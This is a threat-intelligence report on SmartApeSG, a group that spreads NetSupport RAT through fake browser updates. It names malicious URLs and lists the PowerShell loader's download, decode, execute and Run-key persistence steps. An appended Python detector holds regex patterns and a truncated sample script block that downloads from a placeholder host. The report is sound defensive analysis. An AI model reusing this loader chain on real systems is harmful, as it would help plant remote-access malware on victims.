SmartApeSG Delivering NetSupport RAT
By eSentire Threat Response Unit (TRU)
Archived: 2026-04-05 20:06:01 UTC

Adversaries don't work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes. We have discovered some of the most dangerous threats and nation state attacks in our space, including the Kaseya MSP breach and the more_eggs malware. Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit, the TRU team.

In TRU Positives, eSentire's Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward. Here's the latest from our TRU Team.

What did we find?

Early in January 2024, our machine-learning-powered PowerShell classifier, BlueSteel, detected malicious PowerShell script execution. Upon further investigation, the eSentire Threat Response Unit (TRU) attributed the activity to SmartApeSG, a threat actor that relies on fake browser updates to distribute NetSupport RAT.

The execution was traced to the end user visiting a compromised webpage, which served a fake browser update ZIP containing Update_browser_17.6436.js. We could not retrieve the files or the compromised website, but we found similar samples here and here (see References).

The initial JavaScript file included legitimate code sections to conceal the malicious code (Figure 1).

Figure 1: Contents of the JS file

The code retrieves a malicious script from jennifergalvin[.]com/cache/news.php?37668, as shown in Figure 2.

Figure 2: Deobfuscated JS content

The retrieved JavaScript file contains the PowerShell command shown in Figure 3.
Figure 3: Retrieved JS file containing the PowerShell command

The script does the following:

1. $bvQQOQYGOGdiqHsdLSvR is set to a URL (jesusanaya.com/GetData[.]php?10864).
2. $vxjoBVCFtQyMhM downloads the content from that URL.
3. $AcusblBKewkwXkdlGOMKgqQcFhnA decodes the downloaded content from Base64.
4. A random number is generated, and a new directory is created under the Application Data folder with the random number appended to its path.
5. The Base64-decoded data is saved as a file named rtrs.zip.
6. The ZIP file is extracted to the newly created directory.
7. The script checks for an executable named client32.exe in the extracted directory and, if found, executes it.
8. A new registry value is created under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that client32.exe runs at startup (T1547.001).

The Base64-encoded content mentioned above decodes to a ZIP archive (Figure 4). The archive contains NetSupport components, including the client (Figure 5).

Figure 4: Base64-encoded content that eventually decodes to a ZIP archive

Figure 5: NetSupport configuration file

Detection Rules

You can access the Yara rules for SmartApeSG here.

What did we do?

We investigated the threat and confirmed the activity is malicious. Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat, and notified the customer of the suspicious activity.

What can you learn from this TRU Positive?

SmartApeSG's use of fake browser updates to distribute the NetSupport RAT showcases a common social engineering technique, in which attackers disguise malware as legitimate updates or software to trick users into downloading harmful files.
The compromised webpage serving a JavaScript file within a ZIP archive underlines the need for web security and caution when downloading files from websites, especially those that prompt unexpected updates or downloads.

The inclusion of legitimate code sections in the initial JavaScript file to hide malicious content is a classic obfuscation technique.

The PowerShell script's operations, including downloading content, creating directories, extracting ZIP files, executing executables, and modifying registry items, provide insight into typical NetSupport deployment strategies. This knowledge is crucial for developing robust detection and response mechanisms.

The decoding of Base64 content to reveal a ZIP archive containing NetSupport components highlights the multi-layered nature of malware deployment.

Recommendations from our Threat Response Unit (TRU) Team:

- Train users to identify and report potentially malicious content using Phishing and Security Awareness Training (PSAT) programs.
- Identify file types that are commonly associated with security risks, such as executable files (.exe, .bat, .cmd), script files (.js, .vbs, .ps1), and certain document types that support macros (.docm, .xlsm). Then select a file type that is inherently safer and does not support executable code or active content (i.e., a plain text format like .txt).
- Ensure employees have access to a dedicated software center to download corporate-approved software.
- Protect endpoints against malware by:
  - Ensuring antivirus signatures are up to date.
  - Using a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) tool to detect and contain threats.

Indicators of Compromise

You can access Indicators of Compromise here.
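As an added illustration (not code from this post or from eSentire), the following Python triages PowerShell script block log text (Event ID 4104 ScriptBlockText) for the download, Base64-decode, AppData drop, unzip, client32.exe and Run-key chain described under "What did we find?", and shows why single tokens such as Expand-Archive or FromBase64String are not enough on their own. The regexes, the threshold logic and the sample events are constructed assumptions; the first event is a truncated, non-functional fragment with a placeholder host.

```python
import re

# Behaviours of the loader described in this post, each as a constructed
# regex over PowerShell script block text (Event ID 4104 ScriptBlockText).
INDICATORS = {
    "download":    re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I),
    "base64":      re.compile(r"FromBase64String", re.I),
    "appdata_dir": re.compile(r"\$env:APPDATA|ApplicationData|Application Data", re.I),
    "random_name": re.compile(r"Get-Random", re.I),
    "zip_extract": re.compile(r"Expand-Archive|ExtractToDirectory", re.I),
    "netsupport":  re.compile(r"client32\.exe", re.I),
    "run_key":     re.compile(r"CurrentVersion\\Run", re.I),
}


def matched_indicators(script_block: str) -> set:
    """Names of the indicators present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_block)}


def is_smartapesg_like(script_block: str) -> bool:
    """True when the block shows the NetSupport drop chain, not just one noisy token."""
    hits = matched_indicators(script_block)
    # client32.exe together with Run-key persistence is the strongest pairing (T1547.001).
    if {"netsupport", "run_key"} <= hits:
        return True
    # Otherwise require the full download -> decode -> drop to AppData -> unzip chain.
    return {"download", "base64", "appdata_dir", "zip_extract"} <= hits


# Constructed sample events. Event 1 is a truncated fragment modelled on the chain
# in the post with a placeholder host; it is not a working loader. Events 2 and 3
# are benign admin blocks that share single tokens with it.
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText":
        "$w=New-Object Net.WebClient; ... [Convert]::FromBase64String($w.DownloadString("
        "'http://placeholder.invalid/GetData.php')) ... $env:APPDATA\\'+(Get-Random) ... "
        "Expand-Archive ...\\rtrs.zip ... client32.exe ... HKCU:\\...\\CurrentVersion\\Run"},
    {"id": 2, "ScriptBlockText":
        "Expand-Archive C:\\installers\\tool.zip -DestinationPath C:\\tools; Get-ChildItem C:\\tools"},
    {"id": 3, "ScriptBlockText":
        "$cfg=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)); Write-Output $cfg"},
]


def triage(events) -> list:
    """Ids of script block events that match the chain, in log order."""
    return [e["id"] for e in events if is_smartapesg_like(e["ScriptBlockText"])]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], sorted(matched_indicators(e["ScriptBlockText"])), is_smartapesg_like(e["ScriptBlockText"]))
```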
References

https://medium.com/walmartglobaltech/smartapesg-4605157a5b80
https://bazaar.abuse.ch/sample/45b46c432bb3857ff98a2f67f3480b85f8fb37f5df55941e875e2d70f87ca24e/
https://app.any.run/tasks/fd5f0212-761f-43e0-9b60-3762f2eb2074/
https://attack.mitre.org/techniques/T1547/001/

Source: https://www.esentire.com/blog/smartapesg-delivering-netsupport-rat